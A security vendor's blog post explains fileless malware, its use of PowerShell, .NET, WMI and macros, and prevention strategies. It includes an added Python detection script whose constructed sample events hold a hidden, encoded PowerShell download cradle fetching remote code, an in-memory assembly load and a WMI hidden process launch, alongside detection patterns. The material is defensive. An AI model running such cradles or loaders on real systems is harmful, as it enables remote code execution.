
        Key Targets for Fileless Malware

        Published September 9, 2021 • By Reciprocity • Blog

        Cybersecurity threats have proliferated for years, and that shows no sign of stopping. One estimate, for example, is that damages due to cybercrime will hit $10.5 trillion by 2025.

        One especially pernicious threat gaining new popularity: fileless malware.

        Fileless malware attacks are particularly dangerous because, unlike traditional malware, they involve no files to scan — and therefore are harder to detect by conventional endpoint protection tools.

        This article unpacks what fileless malware actually is, how bad actors launch fileless malware attacks, and how you can protect your data from these threats.

        What Is a Fileless Malware Attack?

        Malware (short for “malicious software”) is any intrusive software that infiltrates computer systems to damage or destroy them or to steal data from them. The most common types of malware attacks include viruses, worms, Trojans, and ransomware.

        Most malware attacks are file-based. This means threat actors deliver files such as .doc, .zip, or .pdf attachments that carry malicious code. The goal is to fool users into opening those files so that the malicious script is introduced into the organization’s network. The malware can then steal passwords, delete files, lock computers, pilfer data, and so forth.

        In contrast, fileless malware has no such file that users need to activate. Instead, this “memory-resident malware” operates from the victim system’s memory. It also leverages existing vulnerabilities in a software program to infect it, take control, or steal data.

        Moreover, this malware can successfully achieve its goals even if the victim does nothing more than click on a malicious link or unknowingly visit a compromised website — usually following a phishing email or social engineering attempt.

        Yet another challenge is that fileless malware complicates forensics: because it lives in memory, it simply disappears when the infected system is rebooted.

        According to the Internet Security Report for Q4 2020, fileless malware attacks in 2020 rose by almost 900 percent over 2019, suggesting that fileless techniques are surging in popularity as an attack tool.

        Common Targets for Fileless Malware

        Although fileless malware didn’t really come into its own as a serious threat vector until 2017, it’s actually been around for much longer. Early examples include:

        • Frodo
        • Number of the Beast
        • The Dark Avenger
        • SQL Slammer
        • Stuxnet
        • UIWIX

        One of the most high-profile data breaches of 2017 — the Equifax breach that exposed the data of 147 million people — was also the result of a fileless malware attack.

        Fileless malware leverages trusted, legitimate processes running on the operating system to attack a victim system. Many attacks leverage standard Microsoft Windows processes and safe-listed applications such as:

        • PowerShell
        • .NET
        • Windows Management Instrumentation (WMI)

        Macros are another common threat pathway for fileless malware attacks.

        How Does Fileless Malware Work?

        Considered a “low-observable characteristics (LOC) attack,” a fileless malware infection goes straight into the machine’s memory without touching the hard drive. It may then perform malicious activities such as data exfiltration, credential theft, lateral movement, reconnaissance, privilege escalation, and the delivery of further malicious payloads.

        Types of Fileless Malware Attacks

        Some major fileless malware threats that organizations should be prepared for are:

        Reflective Self-injection (or Loading)

        A reflective loading fileless threat loads a portable executable (PE) directly from the victim system’s memory. Since the malware doesn’t load from the hard drive, it isn’t registered as a loaded module within the process. Therefore, it leaves no footprints that can be traced later. PowerShell is commonly used to run the crafted scripts that load such PEs and carry out fileless malware attacks.

        Reflective EXE Self-injection

        In this type of attack, a function or script loads an executable (EXE) directly into memory. As with the PE loaded above, the EXE is never registered as a loaded module in the process, so it leaves no trace. Threat actors often use a PowerShell script to inject an EXE into the PowerShell process itself.

        Reflective DLL Remote Injection

        A crafted function or script is again leveraged to load a DLL without getting registered as a loaded module. The injection happens into a remote process and is not detected by endpoint monitoring tools, allowing attackers to launch a stealthy attack.

        Malicious Code Execution

        Here, a threat actor tries to execute malicious shellcode using the DotNetToJScript technique. This fileless approach allows the attacker to load and execute a malicious .NET assembly from system memory with the help of .NET libraries exposed via COM. No part of the malicious .NET DLL or EXE touches the computer’s hard drive, so it remains undetected.

        5 Strategies to Prevent Fileless Malware Attacks

        Fileless malware attacks have a high success rate because they leverage common system tools, software, and applications. Worse, signature-based prevention and detection methods cannot identify them, giving threat actors the freedom to cause more mischief.

        Fortunately, one can prevent fileless malware attacks. The key is to leverage an active, holistic approach that incorporates multiple elements, including:

        Endpoint Hardening

        Fileless attacks originate at the endpoint, so it’s important to harden endpoints with security updates, patches, vulnerability remediation, and two-factor authentication. Advanced endpoint security solutions can provide vulnerability assessment, exploit and memory protection, and a desktop firewall to further harden endpoints without affecting their functionality.

        Application Containment

        Blocking unauthorized applications and code from running on servers, desktops, and devices can lower the threat of fileless malware attacks. Further, a safe-listing security solution can separate the “good” software from the “bad” to prevent problems with accessing legitimate tools.

        Behavior Monitoring

        User behavior analytics (UBA) is a good way to identify hidden threats and increase the accuracy of security operations. UBA is also useful as a forensic analysis tool to investigate fileless malware attacks.

        Interactive Threat Hunting

        An endpoint detection and response (EDR) tool investigates unusual behaviors on endpoints. It also searches for and reveals footholds that may indicate an ongoing fileless attack.
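        The following is an added example, not code from the original post or from Reciprocity. It ties together the “Common Targets” list above (PowerShell, .NET and WMI as trusted hosts, macros as a pathway) with the behavior-monitoring and threat-hunting strategies: a small Python triage script that runs behaviour-based rules, rather than file signatures, over process-creation telemetry. The field names follow Sysmon Event ID 1 (User, ParentImage, Image, CommandLine); the sample events, the indicator names and the rule set are assumptions constructed for the example, and the staging URL uses the reserved .invalid domain so it never resolves.

```python
"""Added example (not Reciprocity's code): behaviour-based triage of process-creation
telemetry for fileless-malware indicators. All sample events below are constructed."""
import base64
import json
import re

# --- Constructed sample telemetry (Sysmon Event ID 1 style fields) -----------------

def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects it: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD_EXE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
# Hypothetical download cradle used only as detection test data; ".invalid" never resolves.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/a')"

SAMPLE_EVENTS = [
    # Benign: an administrator running PowerShell from an interactive desktop session.
    {"User": r"CORP\alice", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": r"powershell.exe -NoProfile Get-ChildItem C:\Reports"},
    # Macro pathway: Word spawns hidden, encoded PowerShell that stages code over the network.
    {"User": r"CORP\bob", "ParentImage": WORD_EXE, "Image": PS_EXE,
     "CommandLine": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(_CRADLE)},
    # In-memory .NET assembly load: nothing is written to disk.
    {"User": r"CORP\carol", "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_EXE,
     "CommandLine": 'powershell.exe -c "[Reflection.Assembly]::Load([Convert]::FromBase64String($b))"'},
    # WMI used as a trusted host to create a hidden process.
    {"User": r"CORP\dave", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic process call create "powershell -w hidden"'},
]

# --- Rules (assumed for the example; tune to your own baseline) ---------------------

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "wmic.exe"}

# Each indicator is matched against the raw command line plus any decoded -EncodedCommand payload.
INDICATORS = {
    "download-cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "reflective-assembly-load": re.compile(r"Reflection\.Assembly\]::Load|FromBase64String", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "wmi-process-create": re.compile(r"\bprocess\s+call\s+create\b|Invoke-(?:Wmi|Cim)Method", re.I),
}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the command line carries none."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze_event(event: dict) -> list:
    """Return the list of indicator names that fire for one process-creation event."""
    findings = []
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")
    # Parent/child relationship: an Office document should not be launching script hosts.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append("office-parent-spawns-script-host")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded-command")
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            findings.append(name)
    return findings


def scan(events: list) -> list:
    """Triage a batch of events; return only the suspicious ones, highest score first."""
    hits = []
    for event in events:
        findings = analyze_event(event)
        if findings:
            hits.append({"user": event.get("User", ""), "image": event.get("Image", ""),
                         "findings": findings, "score": len(findings)})
    return sorted(hits, key=lambda hit: hit["score"], reverse=True)


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(json.dumps(hit))
```

The benign administrator invocation produces no findings, while the macro-spawned, hidden, encoded PowerShell scores highest because several independent behaviours (suspicious parent, encoding, a download cradle, Invoke-Expression, hidden window) coincide; in practice such rules feed an EDR or SIEM query over real telemetry, and the thresholds and parent/child pairs are tuned against the organization’s own baseline.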

        Centralized Security Management

        A unified platform that centralizes security management, monitoring, and control is essential to prevent fileless malware attacks. It streamlines security management through advanced visibility into the organization’s entire threat landscape.

        Stay Safe From Cyber Risks and Fileless Malware Attacks With ZenGRC

        The strategies discussed in this article are effective at preventing fileless malware attacks. Meanwhile, cyber threats are always evolving.

        Any organization’s security toolkit should include a comprehensive threat detection and mitigation platform like ZenGRC. ZenGRC can detect fileless malware threats and strengthen cybersecurity to minimize risk exposure.

        Contact us to talk to a cybersecurity expert at Reciprocity today to understand your organization’s vulnerability to fileless malware attacks and learn more about ZenGRC.
